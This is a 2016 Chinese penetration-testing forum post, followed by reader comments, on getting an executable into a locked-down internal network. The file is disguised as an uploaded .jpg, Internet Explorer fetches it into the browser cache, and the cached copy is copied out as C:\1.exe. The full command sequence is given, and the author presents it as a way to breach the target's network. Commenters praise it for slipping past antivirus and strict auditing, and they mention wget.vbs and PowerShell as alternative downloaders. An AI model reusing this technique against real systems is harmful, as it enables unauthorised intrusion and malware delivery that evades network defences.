一个奇葩的内网写入文件方法

2016-07-27 10:24:51 70 刘海哥 6961

引用90sec探讨的问题

找到一个可以上传图片的web站点。

"C:\Program Files\Internet Explorer\iexplore.exe" http://内网可以访问的站点/0/09/40/75/91ef76c6a7efce1bee5deaebac51f3deb48f6598.jpg

执行访问后会有缓存文件。

然后 cd 到C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files>

执行dir /s /w 91ef76c6a7efce1bee5deaebac51f3deb48f6598*.*   找到路径

接下来就是

 type 路径>C:\1.exe  应该可以突破他内网了。

类别渗透测试

关于作者

刘海哥5篇文章100篇回复

刘海哥

评论70次

要评论？请先登录或注册

30楼

刘海哥
2016-8-3 09:54

ahkxhyl：
这个是什么方式没看明白
回复|@ta
1

实践一下就知道了就是利用ie去生成个缓存

回复|@ta|踩(0)|顶(0)
29楼

ahkxhyl
2016-8-3 09:50

这个是什么方式没看明白

回复|@ta|踩(0)|顶(0)
28楼

刘海哥
2016-8-3 09:05

三文kit：
整个过程就是一次HTPP get请求，在审计比较严格的内网是一个写文件的好办法。
回复|@ta
1

还是偶尔能使用到。

回复|@ta|踩(0)|顶(0)
27楼

刘海哥
2016-8-3 09:05

纯洁小白：
没看懂描述的什么意思
回复|@ta
1

哈哈，我也迷茫。

回复|@ta|踩(0)|顶(0)
26楼

刘海哥
2016-8-3 09:05

hundan：
就是另类远程文件下载是吧。。。内网写入。。这四个字看得我糊里糊涂。
回复|@ta
1

回复|@ta|踩(0)|顶(0)
25楼

三文kit
2016-8-3 08:37

整个过程就是一次HTPP get请求，在审计比较严格的内网是一个写文件的好办法。

回复|@ta|踩(0)|顶(0)
24楼

纯洁小白
2016-8-2 12:35

没看懂描述的什么意思

回复|@ta|踩(0)|顶(0)
23楼

hundan
2016-7-30 22:02

就是另类远程文件下载是吧。。。内网写入。。这四个字看得我糊里糊涂。

回复|@ta|踩(0)|顶(0)
22楼

刘海哥
2016-7-28 17:14

xuaohuimc：
小白看不懂
回复|@ta
1

我不是再贴了一个图了？

回复|@ta|踩(0)|顶(0)
21楼

xuaohuimc
2016-7-28 17:09

小白看不懂

回复|@ta|踩(0)|顶(0)
20楼

刘海哥
2016-7-28 08:55

gogata：
为啥没有缓存生成。。。
回复|@ta
1

回复|@ta|踩(0)|顶(0)
19楼

Chris
2016-7-27 23:52

這個不錯, 有時候比較極端的環境還得把 wget.vbs 一筆一筆 echo 進去 ..

回复|@ta|踩(0)|顶(0)
18楼

gogata
2016-7-27 23:30

为啥没有缓存生成。。。

回复|@ta|踩(0)|顶(0)
17楼

gogata
2016-7-27 23:00

这个不管是内网和外网都可以把？

回复|@ta|踩(0)|顶(0)
16楼

anhkgg
2016-7-27 22:39

没看明白~~~~~

回复|@ta|踩(0)|顶(0)
15楼

刘海哥
2016-7-27 21:17

flytian123：
没看明白，再详细讲一下就好了
回复|@ta
1

看下评论

回复|@ta|踩(0)|顶(0)
14楼

flytian123
2016-7-27 19:58

没看明白，再详细讲一下就好了

回复|@ta|踩(0)|顶(0)
13楼

刘海哥
2016-7-27 19:55

zafe：
powershell下载也行
回复|@ta
1

如果有powershell就不用那么麻烦了.

回复|@ta|踩(0)|顶(0)
12楼

zafe
2016-7-27 19:26

powershell下载也行

回复|@ta|踩(0)|顶(0)
11楼

注册用户
2016-7-27 17:19

@skyer 这个方法应该是有好处的， VBS有时候遇到杀毒或者严格的内网规则就麻烦了。这个原生态的下载，应该不错。是个好思路。

回复|@ta|踩(0)|顶(0)